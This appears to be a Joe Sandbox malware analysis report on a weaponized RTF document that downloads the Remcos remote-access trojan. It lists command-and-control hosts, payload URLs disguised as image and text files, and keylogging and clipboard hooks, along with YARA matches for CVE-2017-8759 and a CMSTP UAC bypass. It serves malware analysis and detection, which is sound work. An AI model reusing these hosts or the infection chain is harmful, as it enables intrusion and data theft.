                Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.245.123.11:80
                Source: global traffic TCP traffic: 192.168.2.22:49167 -> 178.237.33.50:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80

                Networking

                Source: Malware configuration extractorURLs: tochisglobal.ddns.net
                Source: unknownDNS query: name: tochisglobal.ddns.net
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 103.253.17.222:6426
                Source: weseethesimplethingsalwaystog.vBS.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                Source: weseethesimplethingsalwaystog.vBS.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                Source: weseethesimplethingsalwaystoget[1].gif.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                Source: weseethesimplethingsalwaystoget[1].gif.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /47/BEN.txt HTTP/1.1Host: 172.245.123.11Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 198.46.176.133
                Source: Joe Sandbox ViewIP Address: 103.253.17.222
                Source: Joe Sandbox ViewIP Address: 178.237.33.50
                Source: Joe Sandbox ViewASN Name: WIFIKU-AS-IDPTWifikuIndonesiaID
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS
                Source: global trafficHTTP traffic detected: GET /47/weseethesimplethingsalwaystoget.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 8_2_0041B380
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5878D53A-917D-4F0D-8E7A-DADC951BC237}.tmp
Source: global traffic | HTTP traffic detected: GET /47/weseethesimplethingsalwaystoget.gIF HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 172.245.123.11 Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /47/BEN.txt HTTP/1.1 Host: 172.245.123.11 Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: tochisglobal.ddns.net
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000006.00000002.377227143.0000000009331000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://172.245.123.11
Source: powershell.exe, 00000006.00000002.377227143.0000000009331000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://172.245.123.11/47/BEN.txt
Source: EQNEDT32.EXE, 00000002.00000002.357699051.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIF
Source: EQNEDT32.EXE, 00000002.00000002.357699051.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIFj
Source: powershell.exe, 00000006.00000002.373509848.00000000026BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://198.46.176.133
Source: powershell.exe, 00000006.00000002.373509848.00000000026BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
Source: RegAsm.exe, RegAsm.exe, 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: RegAsm.exe, 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp9k
Source: powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.micro
Source: powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.micros=
Source: powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsofy
Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.373509848.0000000002581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000 8_2_0040A2B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, 8_2_0040B70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_004168C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, 8_2_0040B70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 8_2_0040A3E0

E-Banking Fraud

Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

Source: 4vzwJTZbwT.rtf, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPED | Matched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 3116
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
